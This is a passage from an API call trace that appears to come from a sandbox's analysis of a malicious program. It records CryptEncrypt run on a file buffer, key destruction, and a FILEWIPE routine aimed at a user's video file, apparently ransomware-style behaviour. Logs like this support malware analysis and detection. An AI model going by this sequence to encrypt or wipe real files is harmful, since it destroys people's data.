lpsz="bool") returned 0x4 [0192.710] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8fd6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8fe0) returned 1 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.711] CharLowerBuffW (in: lpsz="byte[36833]", cchLength=0xb | out: lpsz="byte[36833]") returned 0xb [0192.711] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.712] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.712] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.712] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc04fb8*, pdwDataLen=0x87e820*=0x8fd6, dwBufLen=0x8fe0 | out: pbData=0xc04fb8*, pdwDataLen=0x87e820*=0x8fe0) returned 1 [0192.713] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.713] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0192.713] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.715] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.715] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.715] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.716] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.716] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.716] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.716] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0192.716] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.716] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.716] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.716] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.716] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0192.721] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.725] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.725] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.725] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.726] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.726] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.726] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0192.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.726] CryptDestroyKey (hKey=0x90af18) returned 1 [0192.726] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.726] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.726] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.727] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.727] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.727] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.727] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.727] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.727] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0192.727] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.727] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.727] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.727] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.728] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.728] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.728] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.728] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0192.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.728] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.728] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.728] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.728] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.728] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.729] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.729] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0192.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.729] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0192.729] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.729] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0192.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0192.729] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0192.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.730] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.731] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.732] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0192.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d108d0, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0x4261b480, ftLastAccessTime.dwHighDateTime=0x1d5da61, ftLastWriteTime.dwLowDateTime=0x4261b480, ftLastWriteTime.dwHighDateTime=0x1d5da61, nFileSizeHigh=0x0, nFileSizeLow=0x8fd6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="GwLjRbpo46x9NeDS.mkv", cAlternateFileName="GWLJRB~1.MKV")) returned 0x90af58 [0192.732] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0192.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0192.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0192.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0192.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.733] CharLowerBuffW (in: lpsz="byte[36822]", cchLength=0xb | out: lpsz="byte[36822]") returned 0xb [0192.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.733] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.733] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.733] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.733] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.733] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.734] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.734] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.734] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.734] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.734] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: 